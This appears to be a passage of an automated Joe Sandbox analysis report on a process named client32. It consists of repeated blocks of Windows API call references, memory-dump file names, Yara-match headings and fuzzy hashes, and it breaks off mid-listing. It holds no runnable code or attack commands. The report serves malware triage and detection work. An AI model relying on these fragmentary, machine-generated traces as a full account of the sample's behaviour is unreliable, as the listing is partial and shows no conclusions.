                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$ClassIdleInputMessageNameSendSleepTimeoutWaitWindow_free_malloc_memmovewsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 176360892-0
                                                                                        • Opcode ID: 46178d18f3e88452c3922ee6de201f6dc9fb41c74dc40f097fdd869246f2e59b
                                                                                        • Instruction ID: d41a6b91d128f2eeea48cc74d118894cce712679c930bdd2d1ac7c58a8e7d684
                                                                                        • Opcode Fuzzy Hash: 46178d18f3e88452c3922ee6de201f6dc9fb41c74dc40f097fdd869246f2e59b
                                                                                        • Instruction Fuzzy Hash: 60316075E0061AABDB04DF94CD81BEEB3B8FF48718F104179E915A7684E731AE05CBA1
                                                                                        APIs
                                                                                        • CreateThread.KERNEL32(00000000,00001000,11027690,00000000,00000000,111EE468), ref: 11029813
                                                                                        • Sleep.KERNEL32(00000032,?,1102B0F3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029832
                                                                                        • PostThreadMessageA.USER32(00000000,00000500,00000000,00000000), ref: 11029854
                                                                                        • Sleep.KERNEL32(00000032,?,1102B0F3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 1102985C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: SleepThread$CreateMessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 3347742789-0
                                                                                        • Opcode ID: fda338b6a51c78fe6c2f886b68065117b2ed91385ddfdaae507fd395cc0aabb8
                                                                                        • Instruction ID: 2ae3116f5df8233203c0b5b7c047d092e18a9fbb085bfb1a1d8cc4b180184980
                                                                                        • Opcode Fuzzy Hash: fda338b6a51c78fe6c2f886b68065117b2ed91385ddfdaae507fd395cc0aabb8
                                                                                        • Instruction Fuzzy Hash: F331C576E43232EBE212DBD9CC80FB6B798A745B68F514135F928972C8D2706841CFD0
                                                                                        APIs
                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 111797A9
                                                                                        • __isleadbyte_l.LIBCMT ref: 111797DC
                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117980D
                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117987B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                        • String ID:
                                                                                        • API String ID: 3058430110-0
                                                                                        • Opcode ID: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
                                                                                        • Instruction ID: dd7da2bd4d1e27f38930cbdbffb8ca2b0741d821671db88b966082c1cf8912a5
                                                                                        • Opcode Fuzzy Hash: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
                                                                                        • Instruction Fuzzy Hash: 1331AE31A0029EEFEB01DF64C9849AEFFA6EF01330F1585A9E4648B290F730D954CB51
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(0000002C,B24479DC,?,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B372F
                                                                                        • LeaveCriticalSection.KERNEL32(0000002C,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B376F
                                                                                        • SetEvent.KERNEL32(?), ref: 110B37EA
                                                                                        • LeaveCriticalSection.KERNEL32(0000002C), ref: 110B37F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Leave$EnterEvent
                                                                                        • String ID:
                                                                                        • API String ID: 3394196147-0
                                                                                        • Opcode ID: 41462067ee8128c784213e06cad4e855516fce30d8963978b3823cfd81d7b6d6
                                                                                        • Instruction ID: 8acebb29280036c6a802c58c088d91b2f5c0a2bed23f5f36a778171c733041f7
                                                                                        • Opcode Fuzzy Hash: 41462067ee8128c784213e06cad4e855516fce30d8963978b3823cfd81d7b6d6
                                                                                        • Instruction Fuzzy Hash: BC314A75A44B059FD325CF69C980B9AFBE4FB48314F10862EE85AC7B50EB34A850CB90
                                                                                        APIs
                                                                                          • Part of subcall function 110684E0: EnterCriticalSection.KERNEL32(?,B24479DC,00000000,00002710,00000001,11027140,B24479DC,00000000,00002710,?,?,00000000,11182BE8,000000FF,?,110294CE), ref: 1106858A
                                                                                        • SendMessageA.USER32(?,000006D4,00000000,00000000,0034FEA8,000000D0,B24479DC,00000000,00000000,00000000,?,?,?,?,?,11181208), ref: 110436CA
                                                                                        • GetWindowLongA.USER32(00000000,000000F0), ref: 110436D1
                                                                                        • IsWindow.USER32(00000000), ref: 110436DE
                                                                                        • GetWindowRect.USER32(00000000,1104A5A0), ref: 110436F5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$CriticalEnterLongMessageRectSectionSend
                                                                                        • String ID:
                                                                                        • API String ID: 3558565530-0
                                                                                        • Opcode ID: 7a348eb1ebbebf4d087ed6f90251ea71c232aa61dd705a63114693f89344e778
                                                                                        • Instruction ID: d8135c0911b88fc1f510a9c52ef20d21577c3519517ef8ed33f3b43d0edb38f0
                                                                                        • Opcode Fuzzy Hash: 7a348eb1ebbebf4d087ed6f90251ea71c232aa61dd705a63114693f89344e778
                                                                                        • Instruction Fuzzy Hash: 3121A276E45259ABD714CF94DA80B9DF7B8FB45724F204269E82597780DB30A900CB54
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(0000002C,B24479DC,?,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE81,?), ref: 110B383F
                                                                                        • LeaveCriticalSection.KERNEL32(0000002C,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE81,?), ref: 110B385E
                                                                                        • SetEvent.KERNEL32(?,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE81,?), ref: 110B38A4
                                                                                        • LeaveCriticalSection.KERNEL32(0000002C,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE81,?), ref: 110B38AB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Leave$EnterEvent
                                                                                        • String ID:
                                                                                        • API String ID: 3394196147-0
                                                                                        • Opcode ID: 2035c8d51027f8a8a2080d74f0c386d41a95bf140d8a0374962db8ad330c7d77
                                                                                        • Instruction ID: 58af85e25f85a47ca3d7134065c146d8b9d4bc60aa5d6e9c2c74ed7e6f1a2d6e
                                                                                        • Opcode Fuzzy Hash: 2035c8d51027f8a8a2080d74f0c386d41a95bf140d8a0374962db8ad330c7d77
                                                                                        • Instruction Fuzzy Hash: 1C21DF72A047089FD315CFA8D884B9AF7E8FB48315F104A3EE816C7A04E739B404CB94
                                                                                        APIs
                                                                                        • SetBkColor.GDI32(?,?), ref: 11143091
                                                                                        • SetRect.USER32 ref: 111430A9
                                                                                        • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111430C0
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 111430C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Color$RectText
                                                                                        • String ID:
                                                                                        • API String ID: 4034337308-0
                                                                                        • Opcode ID: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                                        • Instruction ID: e9225e88152d902865c43eb673e3150d6d7e7d22167fd17714d79550e5345a2a
                                                                                        • Opcode Fuzzy Hash: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                                        • Instruction Fuzzy Hash: 0C012C7264021CBBDB04DEA8DD81FEFB3ACEF49604F104159FA15A7280DAB0AD018BA5
                                                                                        APIs
                                                                                        • SetEvent.KERNEL32 ref: 110675BB
                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 110675EC
                                                                                        • DispatchMessageA.USER32(?), ref: 110675F6
                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11067604
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$Peek$DispatchEvent
                                                                                        • String ID:
                                                                                        • API String ID: 4257095537-0
                                                                                        • Opcode ID: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
                                                                                        • Instruction ID: aec9ad63bee144445ad482119ba180fbd35a23c038e7556534d76a428b5108da
                                                                                        • Opcode Fuzzy Hash: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
                                                                                        • Instruction Fuzzy Hash: E701B171A40205ABE704DE94CC81F96B7ADAB88714F5001A5FA14AF1C5EBB5A541CBF0
                                                                                        APIs
                                                                                          • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                          • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                          • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                        • CreateWindowExA.USER32 ref: 110073A7
                                                                                        • SetFocus.USER32 ref: 11007403
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                                        • String ID: edit
                                                                                        • API String ID: 1305092643-2167791130
                                                                                        • Opcode ID: 08210b6cc54d90016c50a1c773d08534ce649efc3e71ddb39b7928ec6fe8f9a3
                                                                                        • Instruction ID: e81607fb03d3f2f95005a1d43bd356d739516b9639758e6caabf034df3046c31
                                                                                        • Opcode Fuzzy Hash: 08210b6cc54d90016c50a1c773d08534ce649efc3e71ddb39b7928ec6fe8f9a3
                                                                                        • Instruction Fuzzy Hash: A2519FB5A00606AFE715CF64DC81BAFB7E5FB88354F118569E955C7340EB34AA02CB60
                                                                                        APIs
                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 110092E5
                                                                                        • _memmove.LIBCMT ref: 11009336
                                                                                          • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                        • String ID: string too long
                                                                                        • API String ID: 2168136238-2556327735
                                                                                        • Opcode ID: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                                        • Instruction ID: dd3894f676f01ff6a75acb4aa2435548b18b289b65f075ee81d5ee4d5d084719
                                                                                        • Opcode Fuzzy Hash: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                                        • Instruction Fuzzy Hash: 8C31DB72B046108BF720DE9DE88099EF7EDEB957B4B20491FE589C7680E771AC4087A0
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Xinvalid_argument_memmovestd::_
                                                                                        • String ID: string too long
                                                                                        • API String ID: 256744135-2556327735
                                                                                        • Opcode ID: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                                        • Instruction ID: 4942d9d917c342fdb8aca387283afa0bcd15718542992abc979dc690a8db670a
                                                                                        • Opcode Fuzzy Hash: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                                        • Instruction Fuzzy Hash: 7931B372B152058F8724DE9EEC848EEF7EAEFD57613104A1FE442C7640DB31AC5187A1
                                                                                        APIs
                                                                                        • _calloc.LIBCMT ref: 1103B162
                                                                                        • _free.LIBCMT ref: 1103B25B
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
